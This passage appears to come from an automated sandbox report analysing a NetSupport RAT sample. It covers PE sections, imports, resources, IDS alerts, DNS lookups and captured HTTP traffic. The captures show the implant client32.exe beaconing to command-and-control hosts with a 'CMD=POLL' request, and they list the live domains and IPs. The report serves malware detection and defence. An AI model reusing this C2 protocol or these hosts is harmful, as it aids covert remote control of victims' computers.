                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0xcb0000x992c0x9a00a96400d0405eea27a4090faf59bfb3d4False0.3461596996753247data5.199307267733568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                  RT_ICON0xcb5b80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                                                                                                                                                                                                  RT_ICON0xcb6e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.34104046242774566
                                                                                                                                                                                                  RT_ICON0xcbc480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.396505376344086
                                                                                                                                                                                                  RT_ICON0xcbf300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5401624548736462
                                                                                                                                                                                                  RT_ICON0xcc7d80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.2475609756097561
                                                                                                                                                                                                  RT_ICON0xcce400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.42510660980810233
                                                                                                                                                                                                  RT_ICON0xcdce80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5310283687943262
                                                                                                                                                                                                  RT_ICON0xce1500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5316604127579737
                                                                                                                                                                                                  RT_ICON0xcf1f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3271784232365145
                                                                                                                                                                                                  RT_STRING0xd17a00x3f8data0.3198818897637795
                                                                                                                                                                                                  RT_STRING0xd1b980x2dcdata0.36475409836065575
                                                                                                                                                                                                  RT_STRING0xd1e740x430data0.40578358208955223
                                                                                                                                                                                                  RT_STRING0xd22a40x44cdata0.38636363636363635
                                                                                                                                                                                                  RT_STRING0xd26f00x2d4data0.39226519337016574
                                                                                                                                                                                                  RT_STRING0xd29c40xb8data0.6467391304347826
                                                                                                                                                                                                  RT_STRING0xd2a7c0x9cdata0.6410256410256411
                                                                                                                                                                                                  RT_STRING0xd2b180x374data0.4230769230769231
                                                                                                                                                                                                  RT_STRING0xd2e8c0x398data0.3358695652173913
                                                                                                                                                                                                  RT_STRING0xd32240x368data0.3795871559633027
                                                                                                                                                                                                  RT_STRING0xd358c0x2a4data0.4275147928994083
                                                                                                                                                                                                  RT_RCDATA0xd38300x10data1.5
                                                                                                                                                                                                  RT_RCDATA0xd38400x310data0.6173469387755102
                                                                                                                                                                                                  RT_RCDATA0xd3b500x2cdata1.2045454545454546
                                                                                                                                                                                                  RT_GROUP_ICON0xd3b7c0x84dataEnglishUnited States0.6666666666666666
                                                                                                                                                                                                  RT_VERSION0xd3c000x584dataEnglishUnited States0.29461756373937675
                                                                                                                                                                                                  RT_MANIFEST0xd41840x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                                                                                  comctl32.dllInitCommonControls
                                                                                                                                                                                                  user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                                                                                  oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                                                                                  advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                                                                                                                                                                                                  Exports

                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                  __dbk_fcall_wrapper20x40fc10
                                                                                                                                                                                                  dbkFCallWrapperAddr10x4b063c

                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                  2024-11-08T19:01:53.533170+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449740199.188.200.195443TCP
                                                                                                                                                                                                  2024-11-08T19:01:53.533170+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449739151.236.16.15443TCP
                                                                                                                                                                                                  2024-11-08T19:02:17.851088+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449733TCP
                                                                                                                                                                                                  2024-11-08T19:02:56.688621+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449744TCP

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.752947092 CET49739443192.168.2.4151.236.16.15
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.752995968 CET44349739151.236.16.15192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.753070116 CET49739443192.168.2.4151.236.16.15
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812295914 CET49739443192.168.2.4151.236.16.15
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812310934 CET44349739151.236.16.15192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812355995 CET44349739151.236.16.15192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.841360092 CET49740443192.168.2.4199.188.200.195
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.841391087 CET44349740199.188.200.195192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.841443062 CET49740443192.168.2.4199.188.200.195
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.844866037 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.850112915 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.851196051 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.858988047 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.863892078 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.873699903 CET49740443192.168.2.4199.188.200.195
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.873713970 CET44349740199.188.200.195192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.873756886 CET44349740199.188.200.195192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.630769014 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.630882025 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.630956888 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.631046057 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.631257057 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.631302118 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.634793043 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.634839058 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.635351896 CET8049741104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.635402918 CET4974180192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.636816025 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.642766953 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.642849922 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.643130064 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.648468018 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.624821901 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.624897957 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.625124931 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.625165939 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.625799894 CET4974380192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630220890 CET8049742104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630310059 CET4974280192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630713940 CET8049743104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630789995 CET4974380192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.630938053 CET4974380192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:27.635672092 CET8049743104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.578772068 CET8049743104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.578787088 CET8049743104.26.0.231192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.578864098 CET4974380192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.579178095 CET4974380192.168.2.4104.26.0.231
                                                                                                                                                                                                  Nov 8, 2024 19:02:28.579219103 CET4974380192.168.2.4104.26.0.231

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.672739029 CET5770653192.168.2.41.1.1.1
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.710263014 CET53577061.1.1.1192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.811403990 CET5710553192.168.2.41.1.1.1
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812823057 CET5529153192.168.2.41.1.1.1
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.820656061 CET53571051.1.1.1192.168.2.4
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.827537060 CET53552911.1.1.1192.168.2.4

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.672739029 CET192.168.2.41.1.1.10x7fadStandard query (0)payiki.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.811403990 CET192.168.2.41.1.1.10x8a71Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812823057 CET192.168.2.41.1.1.10x3d2dStandard query (0)anyhowdo.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.710263014 CET1.1.1.1192.168.2.40x7fadNo error (0)payiki.com151.236.16.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.820656061 CET1.1.1.1192.168.2.40x8a71No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.820656061 CET1.1.1.1192.168.2.40x8a71No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.820656061 CET1.1.1.1192.168.2.40x8a71No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.827537060 CET1.1.1.1192.168.2.40x3d2dNo error (0)anyhowdo.com199.188.200.195A (IP address)IN (0x0001)false

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • 151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                                                                  • geo.netsupportsoftware.com
                                                                                                                                                                                                  • 199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.449739151.236.16.154434008C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.812295914 CET218OUTPOST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                                                  Data Raw:
                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.449741104.26.0.231804008C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Nov 8, 2024 19:02:24.858988047 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.630769014 CET1106INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:25 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df7795488750c13-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.630956888 CET1106INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:25 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df7795488750c13-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.631257057 CET1106INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:25 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8df7795488750c13-DFW
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a6ycPoe%2F1N0ENKONYi9CJTqbFoMe2FudJja4eif6XS%2FkIUbRgCj4nIC99lzu5XSYDEkhiUnslG8GVe0l3ATQ5dyh3k8VBYm%2Bz%2FTUCg%2FNk2XE%2BvePKg3Lb0ksfNTozyUjsXzrnX%2FYccMZJ871"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2178&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                  Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                                                                                                                                                                                  Nov 8, 2024 19:02:26.635351896 CET1106INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 18:02:25 GMT
